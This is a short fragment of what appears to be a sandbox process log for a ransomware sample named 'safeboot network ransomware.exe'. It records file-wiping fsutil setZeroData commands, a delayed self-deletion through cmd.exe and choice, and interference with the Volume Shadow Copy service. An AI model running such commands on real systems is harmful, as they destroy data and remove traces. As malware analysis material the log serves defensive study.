C:\Windows\system32\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵PID:2784
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\safeboot network ransomware.exe2⤵PID:2592
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵PID:3964
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
PID:5292